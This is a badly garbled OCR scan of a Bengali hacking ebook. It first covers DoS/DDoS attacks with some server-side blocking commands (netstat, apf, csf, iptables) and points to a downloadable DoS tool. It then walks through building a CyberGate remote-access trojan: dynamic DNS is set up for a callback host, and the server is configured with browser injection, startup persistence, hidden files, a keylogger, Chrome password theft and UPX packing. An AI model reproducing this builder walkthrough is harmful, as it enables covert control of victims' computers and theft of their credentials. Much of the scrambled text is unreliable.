[ fe4f5^ ] 3 oj«H<i^\3 [ jnfex ] TCP / UDP <P ntor ^ i sos ^ 3? 3<t am oHVMi h<iR>\ 

i ? 3?r ^ ^ 3 cstr ^rf^r (to?tt c 2 ^ fes (Mq& Denial of 

Service cw ! 

3^w DDoS I 3 Sr qjr Distributed Denial of Service I ^ttto St 3oir fw ... orrf% ?tm R?r <St& ^tc^t w 
^TTRI^ 3^W twlt^rSt oTIZFSR <i>fK*i| ! 3^ olPfRr Rf^T RTCR vaR C 2 ^ 3^|> ' 1(^*1 l?l ^ S TOR 3^° \5TO ^TTRr* Si 3X?T SJTWT 

^rr^rPr S^cSi \3?" Rm\3R<pi§I Pilbc^ \Ikft <nPu.^ Rt^ 5 tk^®t i R^ ^R s ^ttfrt os so - s^ ^t[3r®t <ksi ? sg Pm 

(?TR> ^Tv5T S T]R=T 3^R ^THW ? DDoS I DoS 3^ Ws <KsR <Kfl R 5 ^ 3 DDoS <3 v^ilbl^lfl 3<MfC s T 

I WT ! 



oTRR ^ 2 JKTv 3T f% 3^ «TT 5 K B ^ ? :S 3\3$R ^ WR \sT f% ? vsRR RKSW fe^RT C^T <j!3T 3TfW RmRR DoS 

3^° DDoS R^v 3|(.^ ^Ri' ^(.fl I 
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Zumbies 


Attache 



Pitbfi Ibcafi ^vd 


FI 


FI 


fw DoS oTTH^ 6 t ^ ^3 


p 


c ~ 

Attack^''tin Kfv*B ru m In tfr«rtef«: 

piTogpirrj 


o 

Uli 

Happier 


o 

Markltar 


o 

life 


O 

:Hailelter 


1 


Mfcnfeter 


Ce«!PfW1!l-S^._ Ctj.pfip.rcsrT!iB©dl 


Com&tjhftm&c! €mm§MXMvissdl 


jporsi prfswi tewsdi 



Internet 



Targeted ServerfsJ 


DDoS wfcw sre fesT fesr ^ 

































Up RRRT ^JR 


www.BanglaEbookDownload.com 


DOS/ DDoS attack tw ^ia«i f^> ? 

I 

| ^ St tow DoS/DDoS wntw to anw i s) svrro to ^«»iw towt *) sysadmin to sk a i wpp oro wt w fa tow 

| WVltW TO «TIW 

I 

I 


f 

I s) WW ^RvdRR 


^rttr v3t ateiR a fRT^iR ^Sfa^ w RiRT 3 $ rt^tr cr crtrt rirtrr' ter 

RR CRR ^fv^T wRr CRH , RTR oTRRT CRTR (RTR fRRT RRRTR ! 

rrs RyiaaR v3^ ateiR a aaaf QteiTR ^rt?r rcskr faaF ir a<t>fb\£> <r><^cv3 aR&r ff-n?i£ rtrtr rtr rirt a^ rhStr 
;rrrt T 1 ^ i] ^ T fR 7 ^ ^Rh^hi m Riar ! 

spirt Pivsi^ ayiRfrte aR ter 1 


| *) sysadmin aR oft wr ^ 


rv|r crtr airs' rttrtti& spirt rrt w \ vrr Rfvsfhvsi after rrtr ^wr 
rt^tr a^ farte aR ^mrfflffte rt ^rrt cr after rrtr 
fapte aR RiRRir^iR otsttr aR rfte rtrr 

DoS/ DDoS favsiw ai^iR aR s* Sr aror ? 


: 

| _ _ 

DoS / DDoS rtrtrr^ * ottr aterR aR rtr rttr i s) ateiR cr rrtr Rfara *) atera cr Rfara 1 tsr oryf&TR aR rrr ateaRrft 

1 

I spTT - 


faf%R rrr ffrate ^trt otr rtt^r^r , araaR &ter, frsar raa- ^yrfa rw rpit i 

RRteaRRRR ^RWfRR (RRR Rfl?° ^RWfRR sjjaTTR RTfRvI RTR fRR RRT I 
C^bb ‘SJRTflR RIR\3 RTR fRR RRT I 

RpR'iRia (R&\3Rte aR fff%R ST°R ^JTRTTR aiPvs RTR fRR RRT I 

arRTRa t^aiTR aa^ atera aR gs\rr (Rtrtcrtr fatea rrt 3 (rirkrtr rtrr rrtvR arar casar 

CRfRR aR amoitRlvb ^IRW aRR caRKar 

acaaR aR aR rrvrkr rtrrtr rir rv^r crtr RaRr rrt crir fRRvs rkr 


DoS/ DDoSaR (STTR RtSTR ®aTR fR ? 

i 

1 

I \ 

| RTSTR ^Ry a'RCR RJTRRTCR ^M(.v3 RIR RITafR RTTaR^ fRRT , oTTR vsT CRTRTTR 3iRy CRRTR R^R s) RilCRb RR f%RT ^TRRT ^rfefRR^ RTaTR RToTR (R& 
I fro / WTTW 5t^- Ito , }) -a)R>1fl'-3> W«W (m^ ! W WoW WRaf <j>'IWW ^WTW (S^ TOW SWT CMD (?IW IWTSW 

I TORT ft ftp 


I netstat -ntu I awk ‘{print $5}’ I cut -d: -fl I sort I uniq -c I sort -n I 

I P 

| _ ^ | 

I Rfa CaiRR CRTR aRR?T fRf^t RTRRT RRRT RRfR oTTUr (R^R Soo + RRCRR^RR RIRCR vsIR ^TRT fRIRR CR RRR RTRfR aRTR oTffR f%vE>TlR RTfaRTR RToTR | 

| crcr aRbi orr^Pr cr rttr r^rcrr. 1 


Rfa orraRTR atenR APF firewall ^rSr rrt rkr vsir CM D cjs ff^R 


| apf -d xx.xx.xx.xx 


Rfa CSF firewall ^tSr rrt rttr vstr f%^R 


| csf -d xx.xx.xx.xx 


oTfR Rfa RTSTR aR^Tv3 RT RITR , aR^ oirafR Rfa ^ iptables RTRR vsTR fR^R 

RyifR° ftejR fROTR RRR RRTR RiRT RTRR R>fv3 RRTR RiRT RR 





































































































Up RRTO 


www.BanglaEbookDownload.com 


I 

I iptables -I INPUT 1 -s -j DROP xx.xx.xx.xx 


| 3TOIR XX.XX.XX.XX 3R RTR OR RftfR frf RTTR TORTF TOR TO RRR ^ TOR RTR RTTO TOR TORfR fRRi WP6 RToTR <3 RR RTTOvs RTRRR 

| RT 3R° 3R 3^\3 TOfR 3R RRR \3 RTRTOi)' RTRORR RT I 3R TORT TOTRRTTO 5 TOTRRTR (TORfSx 3R TjRR PiOfl <Pfl(v3 TOR I 3RR R|(Rl TOR (RTO 5 (TORfSx fRTvs 
I $(<l RTRT RTORR (\bfTOTObvb vbR o^|b|<p RTRT& (TOR I 


3 RTF! TOTTRT RTOJTRT fRRR TOTR (RRTRTR TjRR CR?TT^T RTTOR^ RTRTRR TOT / fTOSR (RTO 5 RTTOvd TORTRR ^ R^(.TO? I TOTRR (TOR (R^ (TOJR (TOR 


1 J 77 © 7 ^ ^ 37 /W SJW ^RW /r/%TO ^R RR 7 R 3 / 7 TR 


p TORR 5 W (RRT RTR TOTTOR RT (R RToTR (TO TOitTO 5 TORTF FTR CH&(TO$ TO TO 5 ! (Rlts 3TO^T RTRT ^T (JlTOTR fTOR RRFT# TOTR RTCR I TOTfTOR , TO' 

I TOT&TCTOR TOR RToTR fRTTO\3 fa(TOfl fR?[TTO TOTTO TORT TO(R ! TORRTTTO ftPbvs TORTF TOR RToTR fRTTO (TO TO fRTO (TO 5 ^JR^as RTCTO I 3R TOT 

% 

1 TORT (TOT (TOTO*\3 (TO 5 (TOT v5TT?T 3?FRTOTR TORTRR RT , TOf^vs RTlt? RRFjfR TORTRR RT , RfRpFa (TO 5 HT^ (TOT RTtR RRTRfR \3(TO TORTRR RT 
I I ot ®w r^nrftr si7crr ^7^ <mn ay<i fd ^rr iwrr^r fcr mni 2 jT ^^TORT^R (Rffr (RTRT (R[R RIRRT RTFTORR RT I TOTRR (TOR (TOT RfoR (Rlt? ORTRT 


. (TOT (TOT (Rlt? ^RT \3(TO RTRT TO^fR TO (TOT fRR , TOTRT 

0 

I rtrt SfF3 to tot tRR r&toto^ 3R Microsoft Knowledge Base (KB) toKrr 150543 tof tot fRR i 3fcr (totof froro to<^r 3tot I 

i 


p ^W>3.W ?W 3^7 


I Firewall 


| Zone Alarm 


I Comodo 


I fwfrr jw ftfjfM? iw ^mr far 

I 

I 

| S$cto^ TOTTRft^ fro^R rrto tor to?r [ System File Checking ( SFC) ] 3rx ^rr5 tortor TO?TR3?nR [ Internet 
Connection Firewall (IFC ) ] 3rtotrr tor fRR i 3 ^rt fro 5 fro^ tor feromRR tot rkto ! 3^jrt toirtr rt^r fro^R 3R fro^rfR^ 

TOR Rf^JR RTfTOR fRR I 



1 TO/W/^/? TO/^T /W 

I 

| 

| TORRfR RToR 3R RTR (RTRfRTR RT TOTRTORR TORR TORR ^TRT ^R f^t f%\ (RT& fRR% TOR fRR TOR TOR RToTR 3R^ TOIRTOf?' fRPSR 

Srtrr 6 ! r^t HTTP, SMTP, FTP, IMAP, 3R^ POP (to£ ^rt fRR% to^r torrr rt#r 3r rkr 

35JXRT RCRTO RflRhvs 3 Rn fRpSvs © 


| TOTRR^iRR RTTTOR TO RRR TOR I 

; TOTRTORR 3R FiRT fRRRTfRvs (TOT& RRT I 


| 5?(^T^ 3R TOT?TRv 3?TR TORt TOR fW TO^TR TOR RT ! 3R 3RT TORfR oTRT TOTiTOR v3TOR 3 RRTOR TOR (FTOvs TORR I 3R TOR tRRT^RF 
| TO'SlRr$Rvb RR RTOR TOTRTORR 3R ^TOR RR RRRit TORfR (TOR RTRR TORRR 3R^ RTRRR fRR^T v3 RToR ^JpTO v3 (RTF TOR R(RTO ^R I TOF^R 
I TOR TOT?nRv3?TR 3R fSTOIRI TOfR 3TOR fRR (TOR fRR 


Symantec 


TOfTO° fR^R fRTTOTO RRTf TORTR TORT TORR rRs TORTR TORT RR 
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jrttst DoS / DDoS attack r*|trr jr rtrtrt 0 R 3 ?tt rtr i cw RioRev I 

' 5 JTRR oT\*T DoS voJilblR < 1*51 <1 ? 

^c <s H<t 5 oiw DoS rrt rt?t i v3c<i ^r / r\°>r era - >i^ Rwfe j^hir crrtr i facbfi rtr ^crt ; ^jrrr <^<^\ 

V3T5RT^R (R Wf v5R RTT&R 7 ^RTvs © 



3RIR^ C^v3 RTR oJHfll (R RHft? tftvD v5R RTT&W vdTR RToTR v5R Rlt&IR^R RKR RTR RTRCR fRRT JR° JR RftPf Rvs ! JI?T ORRTR 3iRT SWT 

http://uptime.netcraft.com ftrw rtr jr^ cr rt^ St rt^rr rrtvs ftr \st fRiFR crrtirt tfeR R\s rtr fRf^ftt r^t j ftr*jR 1 


RsAFT 


INTRODUCING T 1 


BILL OF RIGHTS 




THE HOSTING 

INDUSTRY* FIRST SEE WHY 

CUST0HER SILL IT'S BETTER 

OF RIGHTS 


Whats that site running? | 


I About The Netcraft Web Server Query Form 


| Saarch^^^J<IC^j ifSjfS 'QCRR ^ll^G il?l 

WKW 41Z Search 


Sites on the Move 


Today's changes 


We report a site s operating system, web server, and netblock owner together with, if available, a graphical view of the time since last reboot for each of the computers 


Internet Exploration 

Netcraft Toolbar 


serving the site Further information about what we measure and how we measure it is and other factors affecting me monitoring process are available here 

Last week 

Last Month T?,e Qfaphs for each site display bom me actual times since last reboot (as an X) and a moving average of uptime over Bme as a solid green area graph The colour of me 
X changes in me event of the site switching operating system A history of me operating system web server and hosting location is also provided so it is possible to 
correlate these changes with me uptime of me site When we are unable to get a valid uptime measurement for a site, a gap will appear in me plots of me raw data points 


What's mat site running? Quef,es afe ma<,e on a da* 1 * basis. so me crosses on single server site will appear as a diagonal line moving forward through time until the next reboot Srtes using 

„ „ ' multiple front end servers with some form of load balancer will show parallel diagonal lines 

Search Web by Domain 


Internet Data Mining 

Hosting Provider Switching Analysis 
Hosting Provider Server Count 
Hosting Reseller Survey 
SSL Survey 
Web Server Survey Archive 
Performance 


Daily reports are generated showing me sites and hosting locations with the longest uptimes 

Example Site 1 - www.demon.net 


Uptime for www.demon.net 

Note: Uptime the time since last reboot is explained in the FAQ 


Generated on 7 May 2009 


wwu.denon.net 



JRTR Rlk (R3T1R? fRCFR fb s\ Gs (RRKRI ^ ST oT\*T R^T R^R I 3RR f5 ^TRTCRR (R RR[R \3^ fRpfe RTtt? ft? oTTf&TR^ J RCR RlfR RfR 

}R ft ^<1^ oT^fR ^VI(&R tT JRtT RRRT3 fROR RT*[R 


RTlf%° f*T^R PiosiW* RRTf ^RTR RiRT RCRR ^[vs ^RTR RiRT RR 
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Whats that site running?* 


hMm* 


Search 


OS, Web Server and Hosting History for \w 


IrittpiaM 


Try out the Netcraft Toolbar! 


n was running Apache on Linux when last queried at 31 -Mar-201213:52:57 GMT - refresh now Site Report 


<MH 


FAQ 


OS Server 

A 

Last changed IP address 

i Netblock Owner 

Linux 

| Apache/1.3.27 [Unix} | 

31-Mar-2012 

1 216.21.239.197 1 

Register.com, Inc 


We have no uptime data for* 


wt present, and cannot plot a graph. 


The host? 


•has been added to the list of sites that we may monitor. We will start monitoring w 


HHHl in 


the next daily monitoring cycle. 


We will continue to monitor this host for a few days, to get enough values to plot a graph. After this time the host will not be monitored again unless it’s requested again, 
or it is one of the most frequently requested hosts. 



p w Apache/1.3.27 (Unix) mr It 
I s\ v5^r omtFF ww to?tt wr i 


i sfe r 3^ Prftt s& i s\* m ^ ^ tnr cwr^n swSi <?t 3 $ 


• Apache 1.x 

• Apache 2.x 

• GoAhead Webserver 

Si^ffi : TRT * 



I 


p DoS/DDoS sintFF sprt oiw 
| omtFF 5*r Mediafire s\ ottott^ 

cwratt t*r ftpr i 

p 

m3?rrt ^ www.tunerpage.com 


bi^c'i stT^rPr CMD (r^3 Itcsr ^thfi to ^ibivsifi 

<KflR I 5 ^ ^T v 5 TS* 1 (. c 1 lvb <b? 1 (A 3 f?N> ^55 3 $ I stPRIW 

votlPt vS^T 5 ^ « 9 ^tl \ 2 >RfH>l ^TTR <KflR Olblfl 3 C^fFt Rt^ RfR ^ f^T 5 T ■w'S'l tf l^flOS 


F/F Info 

Report date: 2012-03-31 16:15:00 (GMT 1) 

l 

I 

I File name: pie-rate-production-for-tunerp 

I 

I 

I File size: 2162657 bytes 


MD5 Hash: 951c614d223c4cf8b40cb42aecll4f46 


f*[^T feil^ ^fllfl Wy iibpvk) <T><qI<q v54<=HS 
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SHAl Hash: fa5c2ed8a3cd60aef0a976a45e2f50c02baa4516 
Detection rate: 0 on 9 (0%) 

Status: CLEAN 
Detections 


Avast - 
AVG - 

Avira AntiVir - 
ClamAV - 
Comodo - 
Em si so ft - 
F-Prot - 
Ikarus - 
TrendMicro - 

Scan report generated by NoVimsThanks.org 


.3 SIS PTWICT 3<Ih!| lAl^l <M«Si <KS Pi "I I ISIS 5 ll«1I ^T '3T S I®T “MM V vs ST'P'TS' ’IIISS I 

s) srftpr 
>) 'Siyrisw 
vs) (?rr& 


sn^pr a'a - sts - ^ sircar 1 |ts> <«r3?n srftpr srnts^r 6r nts - Ppvp sttiesm' sits' sits’T'T Pp^t vo i^* 1 jsts ^iiCis 5 

S^T I STPT SHST CTS I olWI'S 5T?T STl% ST SS®! '9ll t WIS ^ S’TS' Pits' & 'OISlClS 5 <PSW> ST^pT I SITS' Sp RnSS STTrSTS <PSW> FIS 

vs IS S^[ SI^USS pH ! 


^rrf%° f*r^T Pu^ic^ ^w\ 
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l 

: 

J 


<iil(H*j> 5i#< Mm- RAT f%? s*r?? R>«iw ? RailSa 

I 

: 

I 

FilPlF* ^|(<K 3F" VF FCF^ OJMb«HI <PFF RAT fat^ th31 FT <KF FHF (Ft FFFF JI?T (Flbl^fb R*l|«l Fv5" fbS®1 ^ OTvs ^KF 

I 

1 

I ^filfi oJTCF oTffF F(F fF(\3 Fit oj|'Siw j fi fi?^F t •'rfoivsfi fFFF fF(F I olrfF CfFTF ^fiR ’Jfjt CTCif 3l*HHJ I FFT TO" oJFT (FFF ^vs«uf <imifi 

| ^fiw«i FT I oITF F>FTO vsTfF oFTFTFTF (FFF Ff^sl WPpTFF SiFTt lbS®ilfi C^FST olFFT ofrfF Ff^t FfF’F' FT @ 


Intro 


| oTf% ^T#FT ofiFTF' M FT oTffF ?^F f^F oTflFTFFT ^ F^T fVCFfR ©oJIFKFF oTflFTST RAT oTIFTF' W FTCF FT^TFFf TO5F i)F FF CF(F^ 
vs'^SI ^ © RAT jf' <jf <jf ^ Remote Administration Tool I ™ frffvs ffivs cfft RAT ^ tiff tiffTt fff^fttf' w ftfot 
| FT ilFFfFF' F^FR^TF' (¥ 3F^t FTTF 3F^t tFF^F WT iFF^F FFTT FTF ! fWW FWvs'l FTFT\3 CFFf RAT 3F (SJTTO oRFF> (F% f%^ I f%oT(F 
| ^TPJF fFT^TFlt (FF F>fF © 


| ottfftft f% FFit TeamViewer / UltraVNC jsjtftf ftf tiftff ? ^sjjftf ftf FtFfSvs ? fft fttftf &t ojiff- ff^t stf w © 
TeamViewer, UltraVNC ^^jift twRAT fw <3^f Rfift RAT fffftiftto off s\ ff^t IxoSf ^f ftcf fftoff fftt f?t , cf&t (vs 

oTFFFFF F>FT FF fw FFt FF oT*pf% TO FT TOFT FTTWI fW oJTFFT (vsT FFlt FWPT ©\3lt oPTFT FTFTF IF fF(Ft oTTCFTFFT F^FF ©tftlFTF FT 
oltFF RAT 3F FFF%St FFTsT fFFTF \sTF CFF^ FTFF olTFF oTITO ^F (F^t I oJ|6Y(.4 oTRFT CF^IFlt fFWfFvs oJKFTSFT F^FF © 


: 

: 

; 

: 

:: 

; 

: 

; 

:: 

■ 

: 

: 

: 

: 

:: 

; 


; 


;; 


: 

: 

: 

: 

: 

| 

: 


RAT 3ip^r 3w ij^&r f^3T 3 w ? 

• ^lwii iW? ^|5>< ‘K'Sl'l “PS I 

p 

• St°T , \3TFF FFFT <t J C°5l c 1 v3 HFPT& TOFT 

• FltF FYIFWF^ - sj\3 , F^fF , (F 3 ^ , RPlb , aiS^ , oTTFCFT^ , FT^FTFTF tvsilR 

• (*TF <t J C°5l c 1 ~ v5F F^FT^ t^i" F^FT 

• PrfF tFFlFFF FFF 3TFFF , ^JTF , FFnFTFT^ tvsTlfF CTFTF F^FT 

• (slRiRS t^TWT oTTTW TO?TT | 

• FTv3FTF F^TF F^FT 

1 I 

tFfe FFTFF <£tW ^FT FTF FTFT RAT JF WsTF olfwift , 3TFF 3^TF f%F^F ilF f^F 3F ^FF olTFv3 \5FTFF ! 

I I 

I I 

1 I 

• FTTOFT^ ^Jfl FFT , Ca’Rbb FF^ >3F fvbCb'l ^Ifl F^FT 

• #Tpr^ OTTSTF FTFTfF | 

• Prf^ / RR)Rb FF FFF t^T ^3 FFT F^FTvs FKF ! 

• fFFT FFFTF \3 (.HlfbCF FR^T FFFF (F> (FfjSTWTfe' FFW FTCF >3F° \3 FFTvs FTCF 

• ilFTjST oTTF Fl^iTF FF^T F^FTvs FKF >34>bl RAT ! 


miwmmmm 



RAT Sffi CFH®T 3<MfK\2>'i oIK^ f%«TT ? 

i ^tFf% (F&T , RAT FTFTFFvs ^ FF^F , JF^T UDP , CF&Ras (FFF FFIFF (FFF (FT& FTFFas FF ^ [tftlFTF ^]TFT ] oJTF oRT&T TCP Sockets 
| UDP Sockets ftfftf f^f" fftoff ttff f^f" R1%f cfk6f ftfkf [ Ptftf yrr jffiff ] 


; 

? 

i 

: 

: 

: 

:: 

; 
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(S (5 (5 (5 


I I I 


^TffsT 4v3^TT 

(oft" f% 1% oTTC^T f*lF& 


RAT ? 


t^fw \3 j4*m\3 Sr Remote Administration Tool 3?r 3^x vsTToW 


vblvbHC'I'lvb 


eFJT^ 434 ^oTPJT 


CiW 


DarkComet 

Poison Ivy 


I 431^ fwf4 W34 CyberGate I Cybergate vbi'S'HWivb 44 as ^ 4?p I 
3$T fafe^lM^Tfl 3 OTTOTT4 W ©TO - 3STW 4ft4P3 W 3 fa?T <£ 


3Sl4 (4T°T vb R(.fl^ vbl'5®iC c 1lvb 5 Tl$f% vTT^ oTfpT 


File Info 

\ 

| Report date: 2012-04-01 23:52:11 (GMT 1) 

I File name: cybergate-vl-07-5-zip 
| File size: 2389553 bytes 
MD5 Hash: 7207dd93f9ac027059e7e4ef7d310686 
SHA1 Hash: 75636952e912d6c889e31af7be98ec4610ecee54 
Detection rate: 5 on 9 (56% ) 

Status: INFECTED 

I 

P 

Detections 

§ 

[ 

Avast - 
AVG- 

Avira AntiVir - BDS/Backdoor.Gen 
| ClamAV - 

Comodo - Heur.Pck.EXECryptor 
| Emsisoft - Trojan-Dropper.Win32.Decay!IK 
f F-Frot - W 3 2/M a 1 w a re I -. G M Q Y 
\ Ikarus - Trojan-Dropper.Win32.Decay 
TrendMicro - 

I 

1 

t Scan report generated by 
I NoVirusThanks.org 


f IflOIlt (5W \5?T «TT ^3ST 'SJWIfl f^T 34 (34T 3413 4T ^PlPbvs) 9 iT4T^ 3K?M I ^ ftPb\S) «TT 9 H4T«T f^tl> 4[4 0r3T4 

I 

; ;] 'h'i'iFi S*«*i St otsf 4t4 far i 


RiipK f*r^jr Pic^u^ 
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I R>»im RAT ihB-oiih ^?pt ? 

1 

| 

| otrr rr ^3 cwfRi RAT § ^rr ©\sr rPt jrr ow Cyber Gate m R&ifsi'vs ^ i \sr rrs 

1 ISSiw rrt RAT rt? rr t%R rr^> r/^r fV^>r IbStbilsHN i w*m TJ- Mir \3i?(.^si fV^r (bS®i Sr orr ^rt fw^ 

| x 

I I 

i" ■ 

I 

I Cyber Gate 

i 

I 

| Cyber Gate r$rr ^ri\s rrw ^vs^t fef*R rir vbiSwi'vb ^r i vbiSHRivb ^Ri\s r^rr 5^ ^ i 

I 

• No-IP Due 

• Winrar / Winzip 

f 

I 

SRr? ^PTT vblS^RIvb <K?I Pm I X TRT ^R R7l1%V3f§RR &[ C^R <Kfl Ih«1 

I a?T f%FR *fR 5JPTT ^HfM Sfl^T 


prt" ^r «tt rr®tr rtc^r PrPr oa i -R 



aaiat http://www.no-ip.com/ 3$ a rr f^F?r fter Rs rrr srrr rr Rfe^R aftRT ^ R?jR 


no-ip _ 

The DNS Service Provider Home D( 


Managed DNS 

No-IP Plus, The complete managed DNS Solution 

Easy to use interface Complete control over your domain 

FREE dynamic DNS update client Includes 50 hostsJsub domains 


Home Download Services 



Sign Up! More Info 


<3*11 w 

cdfoc.^*njf2il^ 

P^T 


Support Company 
User Login 





Register Your Domain 


Additional Services 

^ No-IP Enhanced 

Upgrade your No-IP account 
to unlock many exerting 


# No-IP Backup DNS 
Maximize uptime and add 



p r cro rrr rrr ( 2 jr Free DNS R?jR 

P ^Tlf%° f*T^T PiC^U^ RRR ^f% d’fllfl 3RT °R | 

$/MSW/W/W/W/W/W/MSW/W/W/W/W/W/W/W/W/^^^ 
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Free DNS 


Enhanced DNS 


Plus Managed DNS 



$0 /year * 

TRY BEFORE YOU BUY 


• 3 hostnames 

• dynamic DNS updates 

• URL redirection 

• personal use only 

• 30 day account confirmation 

*Good choice for users that only need a 
hostname or two and don't mind 

miming their mounts every 2Q days 






$14.95 / year 

CUSTOMER FAVORITE 




Sign Up 



<53 


Free DNS I 


25 hostnames 

• more domain name choices 

• phone and email support 

• no ads on redirects 

• commercial use ok 

• no account confirmation 

*Good choice for users that need more 
hostnames and don't want the hassle of 


$24.95 / year 

GREAT FOR BUSINESS 


• 50 hostnames 

• use your domain name 

• anycast DNS 

• 100% uptime guarantee 

*Good choice for users that want to 
control their very own domain, ie 
yourname.com. Also a great business 
solution! 


fttbfl fbCasi ^Tvd <k?I OtW 


s> 

Account Information: 



Username: | pj ra te_kiing 

4 


Password: 

5 


Confirm Password: 

6 


, Account Access: 


Security Question: 


Your Answer 


jf Terms of Service: 


Who was your chit'-::: r e':" ▼ | 7 

8 


Birthday: 


-3 K 

10 


Please review our Terms of Service (TOS) below By creating an account you are agreeing to our TOS and 
Privacy Policy The TOS states you may only have one (1) free account, and that creation of multiple free 


[7] I agree that I will only create one free No-IP account. 


12 


Terms of Service 


1. ACCEPTANCE OF TERMS 


No-IP. com is an Internet-based Web site that offers DNS Hosting, dynamic DNS. URL Redirection, email 
hosting, domain name registration, server monitoring, and software utilities {each a "Service" and 


By clicking on 'I Accept' below you are agreeing to the Terms 


lervice above and the Privacy Policy . 


13 


I Accept, Create my Account 



^TFRR '9JuRj (\3 \3I?TC\!D ^JTRR >9J|'5Rj 4^ f*R 1 rW «#r c^tc^t :j tr 

oTT 5 RW 3h\3 5 1T 5 T\3?n^' <tRr 


'W 
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Forget your password? No problem, Click Here 



Login J 


afi^i totw ftcbfi fter^ ^3 Add a Host a 


Your No-IP 


Pirate, welcome to your No-IP! 


Last Login: 2012-04-01 15:14:40 PDT from IP 4 


You have successfully logged into No-IPs member section To start using No-IPs services select an icon below or choose 
an item from the navigation above 


Manage Domains 





Add Domain 


Refer Friend 


Add a Host 




& 


Manage Hosts 




OT CTO \32rTC®T PiCbfl ^Rfl Ws <K£l S 


^TOT?r Try 9m b gt&t (vbic^'H 9mt ^ Create Host a 


f*r^jr Pk^u^ 
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Hostname Information 

Hostname^ 

^|2 

© 

Host Type: @ DNS Host (A) 0 DNS Host (Round Robin) © DNS Alias (CNAME) 


© 

© Port 80 Redirect © Web Redirect 



IP Address: flMMHP 


© 

Assign to Group: -NoGrouD- [ DNS Host (A) Options| ^ | ~y Configure Groups 


© 

Enable Wildcard: Wildcards are a Plus / Enhanced feature. UDorade Now! 


© 


♦ Accept Mail for your Domain 

Let No-IP do the dirty work. Setup POP or forwarding for your name. 



MX Record MX Priority 

Enter the name of your external mail exchangers (mx records) as hostnames not IP addresses 


If you would like a more MX records, please upgrade to No-IP Plus or Enhanced . 



O 


Revert J Create Host ] 


| 3RR otHfii No-IP DIC I Wbl vb| 5 «HC .°1 Ivb <K 3 I 3 RR ■ t oR c 1 bl(.<h $**113*1 <Kfl 'S'i c lR 'b'i'lR I 

| m v 3 m ^5 No-IP DIC chtsjw frr i s\^ http://www.no-ip.com/ gs tef?r 3 m3?n6 fw 

N i 




efsr Rcbfi ^Rfi asfor Select Host s\ 

| vdiR<m\^ awR i aSw arera" fer cao 


i a<hbf c^t& \3ia=r Rra®TR taR <^fii uiab Sr 


f¥p Rc^u^ ^w\ rrtr 
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Control Center 1 



101 STOP 


Minimize 


lr~H Maximize 


jft'l Builder 

► 

^ Options 

K 

Tools 

► 

^ Update 


© About 


© Exit 

J t 

n «/ 


Identification WAN i LAN 



Expand menus 

Collapse menus 

View 

Language 

View FTP Ing'i 


Select listening ports 


Visual notification 
Sound notification 
Display flags by GeoIP 
Select notification sound 


| 3to r <m to s to to 100 ^ 
I RTRR 5 R sV H\3 (3TO fRT iR° (TO 


* TOR 3 I vs TOR TO 4TH4*M S\ <T ^^ITT (too ^ W TO 


Select listening ports 


2 H.fc.ll | 1 1 


X Delete 


]S 


Connection password 
4 | QPB765 | 

[VjShow password 
^ j[ ^^^Save^^j 



^trw control center j ^t?r Builder > Create Server j ^?p 


— Control Center 

ITT - 

■ START 

0 STOP 

— 

Identification WAN i LAN 


Fg Minimize 
j~T Maximize 




^ Options ► 

■ 

fC Tools ► 

^ Update 
@ About 


© Exit 

Finn 




?)|R»\ Pl^T pKilW S*H “Pfllfl «i«ll *t,(e <Pfl IS «T?T 
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Create Server S$06i v3W New 3 ^ w ^3 cwb fw 31 ^ 


Create server 


Users 


New User 


EE 


1 

The name of the new 

user is 


pirated 

1 2 

3 




1 0K i 

| Cancel | 





^Ta tefW ^w\ f\s> Pu. 0 !^ Forward s\ PN> ^«r 


Create sender 



tow 
X Delete 


t-V Forward 


5 rc^ Sw^i (\3 c 3 ^ DNS $ 2 n^' ®tt <3^t vdt Pk^ RRPib 


^yif%° f¥p ^w\ ^fiifi 
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Message j Keylagger , ^ Anti-Debug Create server' 


cybergate 

W\ Show password 


taffl <Pfll Wldb ! 100 pRjR PlCbfl ^Rfl <KSl 


Please enter connection address and port 



3rr Identification sa c-mc^tchi Rpfe Piw ttc?r ss^ m3?rpY ssa w$ m3?n£ Ppjr 


DNS 

tunerpage.serveblog... 



t | , |l,. Message | ,*, Keylogger I #■ Anti-Debug Create server 


Port 

100 


^ Add 
X Delete 


Identification 

Password 


1 

|tunerpag^^ 


2 

|09S765| 

■ 


[ff]Show password 


jrr Installation Syr Rcyi? Pitbfi ^Rfi sr fS^ Pi«i i Stsw ^Sr Random <nS®i s\ Sfii^j^r 

<K^<MR <Kfl Pr i 


^yif%° Pr^jr Pt^u^ rrr «r 
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Create s 




Message TllT Keylogger | Anti-Debug | f Create server | 


[g| Install server 
InsfallatioruJirectory 
I^^SystemJ 


A. i r a. 



■Vd'inDir 


Svchostfexe 

Inject into: 


O Windows 
© Root 
f _ 1 Pro gram Files 

Q Other I c:\directory\CyberGate\ 


No injection 


□ Default Browser 


Boo t 

[V] -I KEY_LOCAL_MACH INE\Softw a re\.\Ru n 

[ 7 ] H KEY_CU RRENT_U SER\Softw are\.\Ru n 


[V] D Dlicie 5 \Explorer\Run Policies 


explorer.exe 

F 71 ^ersistance 
[y] Hide file 

Change creation date 


12 ] 

Active Setup 


Mutex 

fn 

10 ASE 54 -WKA 2 -QY 1 L- 3 Q 4 E- 36 XR 60 W 4 LN 5 V} 

| 0 Random 1 



DN 5 SNJ 42 BAFOKO 1 



3<rf?r Create Server Sin cw Ptirt ws ^ w Pr ^ Create server j 


Create server 


Users; ^ Connection v Installation i Message ] Keylogger | Anti-Debug Create server 


■i 


[yl Use icon 


[T] Compress with UPX 
□ Bind files 


[y] delayed execution 1 
[yj| ioogle Chrome Passwords] 


[Seconds) 


Create server 


Connection 

DNS 0__tune rpage . a e rveblog. ne t : 10 0 

Identification...tunerpage 

Password...G3S7G5 

Installation 

Inject into:_Default Browser 

Persistence..__. - ._______. ... ...Yes 

Hide file.-----------------------------.Yes 

Change creation date__-_.Yes 

Melt file..... .Yes 



RAT oHb^rr (*r i 3 ^r Rt^fi Cs ,exe Sr Ro 


f*r^jr Pic^u<p otrr <pfn?i 
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n 

Save 

i Executables f.exe) 


Cancel 


3Sr fro *pr to 


<I|R> ^0:% W FT& ^TOTTfe 3TO FTO ^0:% frorfSx ■© 


| ^ toPt tof to ^tototo^ + tot to£ wf ^f'ohS 3 tofj^ tofto \ror crofcp^?nflk HfM>F Ft 

